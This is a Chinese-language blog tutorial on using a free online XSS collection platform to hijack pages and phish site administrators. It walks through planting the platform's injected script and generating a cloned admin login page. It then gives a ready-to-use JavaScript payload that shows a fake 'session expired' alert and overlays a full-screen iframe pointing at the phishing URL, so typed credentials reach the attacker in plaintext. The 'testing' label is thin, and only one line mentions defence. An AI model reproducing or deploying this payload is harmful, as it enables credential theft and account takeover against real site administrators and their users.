Bootstrap

XSS免费接收平台以及模拟钓鱼一键生成测试

XSS(Cross-Site Scripting)漏洞,也称为跨站脚本攻击,是一种常见的web安全威胁。它通常发生在网站允许用户输入内容,并直接显示在网页上时,恶意攻击者会利用这种机制注入恶意脚本到用户的浏览器中。当其

他用户访问包含这些脚本的页面时,这些脚本会被执行,可以窃取用户的敏感信息(如cookies、登录凭证),修改页面内容,甚至控制用户的浏览器。

XSS的应用主要包括以下几个方面:

  1. 数据盗窃:通过获取受害者的cookie,攻击者可以长期追踪并操纵用户的账户。
  2. 界面劫持:将恶意代码嵌入页面布局,改变用户看到的内容,比如弹出广告或误导页面操作。
  3. 网站控制:在受害者不知情的情况下,对网站执行恶意操作,如删除或修改数据库内容。
  4. 钓鱼攻击:通过伪装成可信来源的网站,诱导用户点击,进而窃取信息或引导至欺诈页面。

防止XSS的关键在于对用户输入的数据进行适当的过滤和转义,以及使用HTTP-only和其他安全措施来保护敏感信息。

在线平台的运用
 

平台的网址是:

链接:XSS平台


这个是我在网上看到比较全功能的XSS免费测试平台 可以利用起来 好知道学习的方向 首先我们注册账号!
然后我们创建个项目



然后查看我们的测试代码

插入我们的测试代码 形成XSS返回上线状态


查看上线信息



即可获取可利用的点来进行xss测试 

这是生成测试钓鱼测试 后台网址url丢入即可生成测试页面 用来获取管理员账密
触发xss之后可以危害到管理员的页面劫持来形成钓鱼测试

钓鱼页面与登录页面一模一样 输入账号密码点击登录之后
xss平台接收到数据显示明文


附上自用的测试代码
 

function go(iframeSrc) {
  // 弹窗提醒用户需要重新登录
  alert("此会话已过期,您需要重新登录。");

  // 获取当前时间的时间戳
  var now = Date.now();

  // 获取上次加载 iframe 的时间戳
  var iframeLastLoaded = localStorage.getItem('iframeLastLoaded');

  // 如果没有记录或者超过了2小时(7200000 毫秒)
  if (!iframeLastLoaded || (now - parseInt(iframeLastLoaded, 10)) > 7200000) {
    // 创建一个 iframe 元素
    var iframe = document.createElement('iframe');
    iframe.src = iframeSrc;
    iframe.style.position = 'fixed';
    iframe.style.top = 0;
    iframe.style.left = 0;
    iframe.style.width = '100%';
    iframe.style.height = '100%';
    iframe.style.border = 'none';
    iframe.style.zIndex = 99999;
    document.body.appendChild(iframe);

    // 记录当前时间戳到 localStorage
    localStorage.setItem('iframeLastLoaded', now.toString());
  }
}

go('输入平台生成的钓鱼测试后台网址');

目录

\xss钓鱼测试触发途径有两个


;